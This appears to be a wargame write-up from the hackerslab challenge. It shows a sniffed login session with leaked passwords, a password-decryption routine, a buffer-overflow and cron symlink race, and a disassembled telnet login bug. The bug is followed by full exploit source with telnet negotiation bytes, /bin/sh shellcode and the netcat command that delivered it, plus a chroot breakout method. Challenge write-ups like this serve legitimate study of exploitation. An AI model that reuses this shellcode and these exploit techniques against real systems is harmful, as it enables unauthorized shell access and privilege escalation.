This is the session in which we found the password. Server responses start
with '<', comments start with '#', "\x03" is like in normal C string.

# Just sniffed most of this from the client
KOFLOG guest eYuPgOwFz\x03
<KOFLOK 0
KOFGETLIST guest
<KOFFRI level1
<KOFFRI level2
<KOFFRI guest
KOFGETINFO level1
<KOFPUTERR level1
# Give me that rfc! ;)
KOFGETINFO guest level
<KOFPUTERR level
KOFGETINFO guest guest
KOFGETINFO guest guest
<KOFPUTINFO guest `TpKbJrA\x08 guest@kof.hackerslab.org ZolaZolaGuest
KOFGETINFO guest guest
<KOFPUTINFO guest cWsNeMuDx\x05 guest@kof.hackerslab.org ZolaZolaGuest
# Looks interesting, let`s try something different
KOFLOG level1 cWsNeMuDx\x05
<KOFPUTINFO level2 fEuuwewZRWo\x02 level2@kof.hackerslab.org level2user
# That`s an interesting password, let`s decrypt that

The decryption/encryption algorithm was easy after a few hours of thinking
and trying disassembly...

void our_decryption_function(const char *encrypted, char *decrypted) {
	int length = strlen(encrypted), salt, i;
	salt = encrypted[length - 1];
	for (i=0; i < length - 1; i++)
		decrypted[i] = encrypted[i] - 1 - i + salt;
	decrypted[i] = 0;
}









We didn't get our homedir from level2 box so i don't remember all offsets etc,
but it was like this:

there was a 1 byte overflow for the username buffer, which overflowed into the
score integer. The score integer was then passes as length to get_yn which made
it possible to overflow a buffer in get_yn because the length could set very high.

the exploit was like:

give a big username
solve a load of questions very fast via a perl script
do the basic overflow for the get_yn() function (do you want to continue? [y/n])

We had to add an alarm(0) and setgid(501) to the shellcode to make it hold for
longer then 1 second :)

this gave us gid level2, after that we put some commands in /usr/games/check2
and build a racer which tried to symlink /usr/games/check2 to /usr/games/check,
so when crontab was ran and deleted /usr/games/check our check2 was ran. 
this gave us uid level2









Level3:

there was a bug in login started by telnetd

 ---- Function : get_serial ----
Referenced from call at 08048eaa ;

08048d44 <get_serial> push   %ebp
08048d45 <get_serial+0x1> mov    %esp,%ebp
08048d47 <get_serial+0x3> sub    $0xd8,%esp
08048d4d <get_serial+0x9> add    $0xfffffff4,%esp


Possible reference to string:
"Serial Number: "

08048d50 <get_serial+0xc> push   $0x80498e0

Reference to function : printf@@SYSVABI_1.3

08048d55 <get_serial+0x11> call   08048b84 <_init+0x204>
08048d5a <get_serial+0x16> add    $0x10,%esp
08048d5d <get_serial+0x19> add    $0xfffffffc,%esp
08048d60 <get_serial+0x1c> push   $0x804ad00
08048d65 <get_serial+0x21> push   $0x100
08048d6a <get_serial+0x26> lea    0xffffff38(%ebp),%eax
08048d70 <get_serial+0x2c> push   %eax

Reference to function : fgets@@SYSVABI_1.3

08048d71 <get_serial+0x2d> call   08048a54 <_init+0xd4>
08048d76 <get_serial+0x32> add    $0x10,%esp
08048d79 <get_serial+0x35> add    $0xfffffff8,%esp
08048d7c <get_serial+0x38> push   $0xa
08048d7e <get_serial+0x3a> lea    0xffffff38(%ebp),%eax
08048d84 <get_serial+0x40> push   %eax

Reference to function : strchr@@SYSVABI_1.3

08048d85 <get_serial+0x41> call   080489e4 <_init+0x64>
08048d8a <get_serial+0x46> add    $0x10,%esp
08048d8d <get_serial+0x49> mov    %eax,%eax
08048d8f <get_serial+0x4b> mov    %eax,%edx
08048d91 <get_serial+0x4d> mov    %edx,0xffffff34(%ebp)
08048d97 <get_serial+0x53> test   %edx,%edx
08048d99 <get_serial+0x55> je     08048dba <get_serial+0x76>
08048d9b <get_serial+0x57> lea    0xffffff38(%ebp),%eax
08048da1 <get_serial+0x5d> mov    0xffffff34(%ebp),%edx
08048da7 <get_serial+0x63> sub    %eax,%edx
08048da9 <get_serial+0x65> cmp    $0x100,%edx
08048daf <get_serial+0x6b> jg     08048dba <get_serial+0x76>
08048db1 <get_serial+0x6d> mov    0xffffff34(%ebp),%eax
08048db7 <get_serial+0x73> movb   $0x0,(%eax)

Referenced from jump at 08048d99 (C); 08048daf (C);

08048dba <get_serial+0x76> movb   $0x0,0x37(%ebp)
08048dbe <get_serial+0x7a> add    $0xfffffff4,%esp
08048dc1 <get_serial+0x7d> lea    0xffffff38(%ebp),%eax
08048dc7 <get_serial+0x83> push   %eax

Reference to function : strlen@@SYSVABI_1.3

08048dc8 <get_serial+0x84> call   08048a04 <_init+0x84>
08048dcd <get_serial+0x89> add    $0x10,%esp
08048dd0 <get_serial+0x8c> mov    %eax,%eax
08048dd2 <get_serial+0x8e> lea    0xffffff38(%ebp),%edx
08048dd8 <get_serial+0x94> movb   $0x0,(%eax,%edx,1)
08048ddc <get_serial+0x98> add    $0xfffffffc,%esp
08048ddf <get_serial+0x9b> push   $0xc8
08048de4 <get_serial+0xa0> lea    0xffffff38(%ebp),%eax
08048dea <get_serial+0xa6> push   %eax
08048deb <get_serial+0xa7> mov    0x8(%ebp),%eax
08048dee <get_serial+0xaa> push   %eax

Reference to function : strncpy@@SYSVABI_1.3

08048def <get_serial+0xab> call   08048b14 <_init+0x194>
08048df4 <get_serial+0xb0> add    $0x10,%esp
08048df7 <get_serial+0xb3> leave
08048df8 <get_serial+0xb4> ret
08048df9 <get_serial+0xb5> lea    0x0(%esi),%esi

which boils down to:

char * get_serial(char *login, char wat[51])
{       char buf[200];
        char *p;
        printf ("Serial Number: ");
        fgets(buf, 256, stdin);
        if ((p=strchr(buf, 0xa)) != NULL && p - buf < 256)
                        *p = 0;
        wat = 0; // movb   $0x0,0x37(%ebp)
        buf[strlen(buf)] = 0;
        return strncpy(login, buf, 200);
}

this is a nice simple overflow but there was one problem, we had to do it over
the telnet protocol. This ment we had to include some telnet negotiation and put
the straem to 8 bit and escape 0x0a and 0xff

the exploit was like this:

--inittel.c--
char term[] = 
"\xff\xfb\x18\xff\xfb\x1f\xff\xfa\x1f\x00\x50\x00\x3c\xff\xf0\xff"
"\xfc\x23\xff\xfb\x27\xff\xfc\x24"
"\xff\xfa\x18\x00\x43\x4f\x4e\x53\x32\x35\xff\xf0\xff\xfa\x27\x00"
"\x00\x55\x53\x45\x52\x01\x72\x6f\x6f\x74\xff\xf0"
"\xff\xfd\x01\xff\xfd\x03\xff\xfc\x01\xff\xfd\x00\xff\xfb\x00" ;

void main(void)
{
unsigned char bla;
 write(1, term, sizeof(term)-1); 
while(read(0, &bla, 1) == 1)  {
 if (bla == 0xff) {
	write(1, "\xff", 1);
 }
 write(1, &bla, 1);
 if (bla == 0xa) {
	write(1, "\x00", 1);
 }
}
}

--shell.c--
char shell[]=
 "\xeb\x48\x9a\xff\xff\xff\xff\x07\xff\xc3\x5e\x31\xc0\x89\x46\xb4"
 "\x88\x46\xb9\x88\x46\x07\x89\x46\x0c\x31\xc0\x50\xb0\x8d\xe8\xdf"
 "\xff\xff\xff\x83\xc4\x04\x31\xc0\x50\xb0\x17\xe8\xd2\xff\xff\xff"
 "\x83\xc4\x04\x31\xc0\x50\x8d\x5e\x08\x53\x8d\x1e\x89\x5e\x08\x53"
 "\xb0\x3b\xe8\xbb\xff\xff\xff\x83\xc4\x0c\xe8\xbb\xff\xff\xff\x2f"
 "\x62\x69\x6e\x2f\x73\x68\xff\xff\xff\xff\xff\xff";
// "\x74\x6d\x70\x2f\x74\x74\xff\xff\xff\xff\xff\xff";

unsigned int esp = 0x8040000;
unsigned int eipinbuf = 204;
int main(int argc, char ** argv)
{
	int i;
        unsigned char buffer[1024];
        esp += strtol(argv[1], 0, 0);
//        printf("Trying esp 0x%x\n", esp);
//	eipinbuf = strtol(argv[2], 0, 0);
        bzero(buffer, sizeof(buffer));
	memset(buffer, 0x41, 32);
        strcpy(buffer+32, shell);
        *(unsigned int *)(buffer + eipinbuf) = (unsigned int)esp;
        write(1, buffer, eipinbuf+4);
        write(1, "A\n", 2);
}


netcat was just the normal l0pht netcat

to exploit it we used:

(sleep 1; ./shell 30640; sleep 1; cat) | ./inittel | ~/netcat 0 23

which gave us a shell in the chroot environment, all left was break out of
chroot which is very simple if sunos lets you open a directory, chroot to a
directory in that directory and then let you fchdir out of it. nothing fancy or
origional about that, just the plain wellknown method